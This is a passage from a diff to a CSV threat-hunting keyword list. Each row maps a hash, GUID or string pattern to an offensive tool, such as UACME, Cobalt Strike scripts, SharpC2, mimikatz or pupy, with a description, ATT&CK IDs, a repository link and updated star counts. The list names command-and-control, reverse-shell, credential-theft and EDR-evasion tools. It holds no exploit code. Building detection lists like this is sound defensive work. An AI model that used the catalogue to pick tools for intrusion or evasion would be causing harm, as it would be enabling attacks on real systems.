Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*912bbb35787c58046da31f1608d07a68753fa4bd8782e29ef80eb51e65e887d2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*913d774e5cf0bfad4adfa900997f7a1a*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*913d774e5cf0bfad4adfa900997f7a1a*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*91EA50CD-E8DF-4EDF-A765-75354643BD0D*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*9209af6bfe87a818df00297bed5517be70c1d931523b71e25813365699df749a*","offensive_tool_keyword","UACME","Defeating Windows 
User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9209af6bfe87a818df00297bed5517be70c1d931523b71e25813365699df749a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*928097a924168caad66fead2633e4d44e4f585e0d33d05deb50b9c2d34cda246*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" -"*9434096968402430d1ace03ffbb13ba28c2e4fcb23e59ed353eac70aa02b5b25*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9434096968402430d1ace03ffbb13ba28c2e4fcb23e59ed353eac70aa02b5b25*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*946D24E4-201B-4D51-AF9A-3190266E0E1B*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) 
via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" -"*969b35213fa23ff50a169e5498a97f28bc6f5820b447b78ec9dc6910dd8cc3e8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*97e0720ed22d2d99e8148aab7ab2cb2cc3df278225669828b2d8d4d9ef856d94*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*9877129f209f0c3faf146ab725442b614c49942b7b888e3aabf5903217cb0503*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*969b35213fa23ff50a169e5498a97f28bc6f5820b447b78ec9dc6910dd8cc3e8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*97e0720ed22d2d99e8148aab7ab2cb2cc3df278225669828b2d8d4d9ef856d94*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate 
backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9877129f209f0c3faf146ab725442b614c49942b7b888e3aabf5903217cb0503*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*99$1a7F1qr2HihoXfs/56u5XMdpDZ83N6hW/HI=*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" "*99E40E7F-00A4-4FB1-9441-B05A56C47C08*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","0","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" -"*9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*9AA32BBF-90F3-4CE6-B210-CBCDB85052B0*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - 
Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9AA32BBF-90F3-4CE6-B210-CBCDB85052B0*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*9AC25A8825407CCB6089BC7A2DF530D1830795B7E71A981ECEE4C5F48387B37A*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" 
-"*9b9dad8b40daf87f796c91a0538198921acebd13d47515e0e27b18eaad6906f4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*9bd3b7a206ced26ce5e03a4002bbd41e4f57b8c8c9ce4467f54221ad68e55a58*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9b9dad8b40daf87f796c91a0538198921acebd13d47515e0e27b18eaad6906f4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9bd3b7a206ced26ce5e03a4002bbd41e4f57b8c8c9ce4467f54221ad68e55a58*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*9c0087f31cd45fe4bfa0ca79b51df2c69d67c44f2fbb2223d7cf9ab8d971c360*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" 
-"*9c71ab720c5589739b70ecd7f5bae0bb6ab2ac043bac1a24aec50864f3037719*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*9ccf0c8c7eef918c9dd7b89dd94f0dfa7dc8779b1f9e862908b09b47b75f7d1f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*9D1B853E-58F1-4BA5-AEFC-5C221CA30E48*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1150","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"*9c71ab720c5589739b70ecd7f5bae0bb6ab2ac043bac1a24aec50864f3037719*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 
+"*9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9ccf0c8c7eef918c9dd7b89dd94f0dfa7dc8779b1f9e862908b09b47b75f7d1f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9D1B853E-58F1-4BA5-AEFC-5C221CA30E48*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*9D365106-D7B8-4B5E-82CC-6D6ABCDCA2B8*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*9E357027-8AA6-4376-8146-F5AF610E14BB*","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","0","N/A","8","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" 
-"*9e3f1386bfb64dbaa3cbb12fd3bf51c734872c2fdf15cf1aaeca52a515767519*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*9emin1/charlotte*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" -"*A La Vie* A L'Amour*","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*9e3f1386bfb64dbaa3cbb12fd3bf51c734872c2fdf15cf1aaeca52a515767519*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9emin1/charlotte*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*A La Vie* A 
L'Amour*","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*a0rtega/metame*","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","1","N/A","N/A","6","508","96","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z" "*A17656B2-42D1-42CD-B76D-9B60F637BCB5*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","0","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*A38C04C7-B172-4897-8471-E3478903035E*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*A38C04C7-B172-4897-8471-E3478903035E*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" 
-"*a3bc28e48c61afe31a0c986674ac145e773d616b2fafb49a090d50cc26ea4479*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*a3bc28e48c61afe31a0c986674ac145e773d616b2fafb49a090d50cc26ea4479*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*A3h1nt/gimmeSH*","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.","T1059 T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","2","168","27","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z" "*a6730ebb3e91961283f7a1cd95ace2a6d0d55e50531a64e57b03e61a8cf2d0e7*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*a7469955bff5e489d2270d9b389064e1*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - 
T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*a78983b009b688a82458abac952516db57dc7eb3118a35cc737dde29c7b87ec4*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*A7AD39B5-9BA1-48A9-B928-CA25FDD8F31F*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","0","N/A","10","1","46","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*a78983b009b688a82458abac952516db57dc7eb3118a35cc737dde29c7b87ec4*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*A7AD39B5-9BA1-48A9-B928-CA25FDD8F31F*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. 
RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","0","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*A8FE1F5C-6B2A-4417-907F-4F6EDE9C15A3*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" -"*aa3939fc357723135870d5036b12a67097b03309*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*aa3939fc357723135870d5036b12a67097b03309*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.exe*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*AAABAAMAEBAAAAEAIABoBAAANgAAACAgAAABACAAKBEAAJ4EAAAwMAAAAQAgAGgmAADGFQAAKAAAABAAAAAgAAAAAQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP39*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing 